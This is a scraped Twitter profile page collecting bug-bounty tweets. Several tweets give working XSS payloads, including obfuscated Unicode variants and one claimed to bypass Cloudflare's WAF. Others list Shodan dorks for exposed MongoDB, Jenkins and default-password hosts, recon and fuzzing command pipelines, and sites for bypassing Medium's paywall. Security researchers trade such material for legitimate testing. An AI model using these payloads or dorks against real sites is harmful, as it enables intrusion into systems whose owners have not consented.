Devu๐Ÿ‡ฎ๐Ÿ‡ณ (@debuhkzr) 's Twitter Profile
Devu๐Ÿ‡ฎ๐Ÿ‡ณ

@debuhkzr

Opinions are my own

ID: 989500939496181760

calendar_today26-04-2018 13:46:22

986 Tweet

436 Followers

300 Following

Nithin ๐Ÿฆนโ€โ™‚๏ธ (@thebinarybot) 's Twitter Profile Photo

Cloud security is one of the hottest topics to master in 2024. As a bug bounty hunter, you can help companies secure cloud environments, like AWs, by reporting vulnerabilities for $$$$ How can I? Use S3Scanner. How to use? Follow this thread.

Cloud security is one of the hottest topics to master in 2024.

As a bug bounty hunter, you can help companies secure cloud environments, like AWs, by reporting vulnerabilities for $$$$

How can I?
Use S3Scanner.

How to use?
Follow this thread.
Clandestine (@akaclandestine) 's Twitter Profile Photo

๐Ÿ–ผ๏ธ Bypass Medium Paywall A little lifehack if you, like me, come across paid articles from Medium. These sites allow you to read paid Medium articles for free: ๐Ÿ”— freedium.cfd<URL> ๐Ÿ”— medium-forall.vercel.app #medium #premium #bypass Cyber Detective๐Ÿ’™๐Ÿ’›

payloadartist (@payloadartist) 's Twitter Profile Photo

โš™ Dorky Came across a recon tool I made a few years back for generating Google dorks, and automatically open the dorks in new tabs. dork.bugbountyhunting.com 1/n #infosec #cybersecurity #bugbountytips #bugbounty

โš™   Dorky

Came across a recon tool I made a few years back for generating Google dorks, and automatically open the dorks in new tabs.

dork.bugbountyhunting.com

1/n

#infosec #cybersecurity #bugbountytips #bugbounty
7h3h4ckv157 (@7h3h4ckv157) 's Twitter Profile Photo

Hey Hackers! ๐Ÿ‘‹ I'm sharing awesome cyber-security resources that I found on the Internet. Bookmark & Share ๐Ÿงตโคต๏ธ #Hacking #infosecurity #infosec #Pentesting #redteam #pwn #CyberSecurity #CTF #CyberSecurity #cybersecuritytips #CyberSecurityAwareness โ€ขAwesome Red Team Ops :-

Otterly (@ott3rly) 's Twitter Profile Photo

Top 3 RXSS payloads I use: `'";//><img/src=x onError="${x};alert(`1`);"> `'";//><Img Src=a OnError=location=src> `'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))> #bugbounty #xss #bugbountytips

Top 3 RXSS payloads I use:

`'";//&gt;&lt;img/src=x onError="${x};alert(`1`);"&gt;

`'";//&gt;&lt;Img Src=a OnError=location=src&gt;

`'";//&gt;&lt;/h1&gt;&lt;Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))&gt;

#bugbounty #xss #bugbountytips
Ruurtjan Pul ๐Ÿ› ๏ธ (@ruurtjan) 's Twitter Profile Photo

I โค๏ธ DNS Iโ€™ve spent 2 years full-time building nslookup.io. Now, Iโ€™m teaching everything I know in this course.

X (@themsterdoctor1) 's Twitter Profile Photo

๐Ÿš€๐Ÿš€Shodan-Dork๐Ÿš€๐Ÿš€ ๐Ÿ” Prodect mysql found ๐Ÿ‘‰product:MySQL ๐Ÿ” MongoDB ๐Ÿ‘‰"MongoDB Server Information" -authentication ๐Ÿ” defult password ๐Ÿ‘‰"default password" ๐Ÿ” guest login ๐Ÿ‘‰ guest login ok ๐Ÿ” Jenkins Unrestricted Dashboard ๐Ÿ‘‰x-jenkins 200 ๐Ÿ” wp config ๐Ÿ‘‰http.html:"* The

๐Ÿš€๐Ÿš€Shodan-Dork๐Ÿš€๐Ÿš€

๐Ÿ” Prodect mysql found 
๐Ÿ‘‰product:MySQL

๐Ÿ” MongoDB 
๐Ÿ‘‰"MongoDB Server Information" -authentication

๐Ÿ” defult password
๐Ÿ‘‰"default password"

๐Ÿ” guest login
๐Ÿ‘‰ guest login ok

๐Ÿ” Jenkins Unrestricted Dashboard
๐Ÿ‘‰x-jenkins 200

๐Ÿ” wp config
๐Ÿ‘‰http.html:"* The
XSS Payloads (@xsspayloads) 's Twitter Profile Photo

SVG File upload payload by Stealthy <svg> <foreignObject width="100%" height="100%"> <body> <iframe src='javascript:confirm(10)'></iframe> </body> </foreignObject> </svg> x.com/stealthybugs/sโ€ฆ

X (@themsterdoctor1) 's Twitter Profile Photo

๐Ÿ” #Recon automation for #bughunters 1- Subdomain discovery with Subfinder: ``` subfinder -dL targets.txt -all -recursive -o facebook.txt cat facebook.txt | wc -l ``` 2- Discover subdomains via crt.sh: ``` curl -s

๐Ÿ” #Recon automation for #bughunters

1- Subdomain discovery with Subfinder:
```
subfinder -dL targets.txt -all -recursive -o facebook.txt
cat facebook.txt | wc -l
```

2- Discover subdomains via crt.sh:
```
curl -s
xploiterr (@_xploiterr) 's Twitter Profile Photo

XSS Tip: If alert() is being converted to ALERT() and you can use Like onerror=" ๐‚ƒ='',๐ƒจ=!๐‚ƒ+๐‚ƒ,๐‚=!๐ƒจ+๐‚ƒ,๐ƒŒ=๐‚ƒ+{},๐‰=๐ƒจ[๐‚ƒ++],๐ƒต=๐ƒจ[๐‚“=๐‚ƒ],๐€œ=++๐‚“+๐‚ƒ,๐‚ =๐ƒŒ[๐‚“+๐€œ],๐ƒจ[๐‚ +=๐ƒŒ[๐‚ƒ]+(๐ƒจ.๐‚+๐ƒŒ)[๐‚ƒ]+๐‚[๐€œ]+๐‰+๐ƒต+๐ƒจ[๐‚“]+๐‚ +๐‰+๐ƒŒ[๐‚ƒ]+๐ƒต][๐‚ ](๐‚[๐‚ƒ]+๐‚[๐‚“]+๐ƒจ[๐€œ]+๐ƒต+๐‰+'(๐‚ƒ)')()" #xss

Brut ๐Ÿ‡ฎ๐Ÿ‡ณ (@wtf_brut) 's Twitter Profile Photo

๐Ÿ“ขa XSS payload, Cuneiform-alphabet based ! ๐’€€='',๐’‰บ=!๐’€€+๐’€€,๐’€ƒ=!๐’‰บ+๐’€€,๐’‡บ=๐’€€+{},๐’Œ=๐’‰บ[๐’€€++], ๐’€Ÿ=๐’‰บ[๐’ˆซ=๐’€€],๐’€†=++๐’ˆซ+๐’€€,๐’น=๐’‡บ[๐’ˆซ+๐’€†],๐’‰บ[๐’น+=๐’‡บ[๐’€€] +(๐’‰บ.๐’€ƒ+๐’‡บ)[๐’€€]+๐’€ƒ[๐’€†]+๐’Œ+๐’€Ÿ+๐’‰บ[๐’ˆซ]+๐’น+๐’Œ+๐’‡บ[๐’€€] +๐’€Ÿ][๐’น](๐’€ƒ[๐’€€]+๐’€ƒ[๐’ˆซ]+๐’‰บ[๐’€†]+๐’€Ÿ+๐’Œ+"(๐’€€)")() #bugbounty #bugbountytips

๐Ÿ“ขa XSS payload, Cuneiform-alphabet based !  ๐’€€='',๐’‰บ=!๐’€€+๐’€€,๐’€ƒ=!๐’‰บ+๐’€€,๐’‡บ=๐’€€+{},๐’Œ=๐’‰บ[๐’€€++], ๐’€Ÿ=๐’‰บ[๐’ˆซ=๐’€€],๐’€†=++๐’ˆซ+๐’€€,๐’น=๐’‡บ[๐’ˆซ+๐’€†],๐’‰บ[๐’น+=๐’‡บ[๐’€€] +(๐’‰บ.๐’€ƒ+๐’‡บ)[๐’€€]+๐’€ƒ[๐’€†]+๐’Œ+๐’€Ÿ+๐’‰บ[๐’ˆซ]+๐’น+๐’Œ+๐’‡บ[๐’€€] +๐’€Ÿ][๐’น](๐’€ƒ[๐’€€]+๐’€ƒ[๐’ˆซ]+๐’‰บ[๐’€†]+๐’€Ÿ+๐’Œ+"(๐’€€)")()  

#bugbounty #bugbountytips
Will Gates (@wllgates) 's Twitter Profile Photo

Easy P2,p3 bug methodology to find sqli, xss and injection attacks 1. waybackurls target.com | grep = | tee param.txt git clone = github.com/projectdiscoveโ€ฆ 2. cat param.txt | nuclei -t fuzzing-templates By:xit! ๐Ÿ‡ฎ๐Ÿ‡ณ credit: RootMoksha Labs #bugbountytips

Easy P2,p3 bug  methodology  to find sqli, xss and injection attacks 

1. waybackurls target.com | grep = | tee param.txt 

git clone = github.com/projectdiscoveโ€ฆ

2. cat param.txt | nuclei -t fuzzing-templates

By:<a href="/xitsec/">xit! ๐Ÿ‡ฎ๐Ÿ‡ณ</a> 

credit: <a href="/RootMoksha/">RootMoksha Labs</a> 

#bugbountytips
Will Gates (@wllgates) 's Twitter Profile Photo

Arjun + KXSS Finding - Parameter - XSS arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss By:Gudetama credit: RootMoksha Labs #bugbountytips #bugbounty

Arjun + KXSS

Finding 
- Parameter
- XSS

arjun -q -u target -oT arjun &amp;&amp; cat arjun | awk -F'[?&amp;]' '{baseUrl=$1; for(i=2; i&lt;=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss
By:<a href="/gudetama_bf/">Gudetama</a> 

credit: <a href="/RootMoksha/">RootMoksha Labs</a> 

#bugbountytips #bugbounty
Faiyaz Ahmad (@faiyazz007) 's Twitter Profile Photo

Discovered a new xss payload that bypasses cloudflare web application firewall!! Payload: <button%20popovertarget=x>Click%20me</button><img%20onbeforetoggle=alert(1)%20popover%20id=x>XSS #cybersecurity #ethicalhacking #bugbounty #bugbountytips #penetrationtesting

Devu๐Ÿ‡ฎ๐Ÿ‡ณ (@debuhkzr) 's Twitter Profile Photo

Yuva Diloโค๏ธ ki Dhadakan, Dil tute khatarnak Jahreele Shayar, Indoor Sahar ki aan baan saan, Seasides ke sabse Lokpriya Sadasya, Hamare Honey Bunny๐Ÿคฃ๐Ÿคฃ, Yuva Hacker: Bhai Vedant Jain Ji ko Happy Wala Bday.๐Ÿฅณ๐Ÿฅณ๐Ÿฅณ

Seasides (@seasides_conf) 's Twitter Profile Photo

Kartheek Lade Kartheek Lade's journey has been nothing short of inspiring. From his impactful contributions to the Seasides Conference to his stellar professional achievements, he has consistently showcased dedication, passion, and excellence. youtu.be/mCMGHQVv8Cc

Branko (@brankopetric00) 's Twitter Profile Photo

DevSecOps: Free Learning Resources 1. OWASP DevSecOps Guide owasp.org/www-project-deโ€ฆ 2. DevSecOps - Introduction (Microsoft Learn) learn.microsoft.com/en-us/trainingโ€ฆ 3. DevSecOps Essentials (EDX - LinuxFoundationX) edx.org/learn/devsecops 4. DevSecOps Bootcamp (Practical DevSecOps)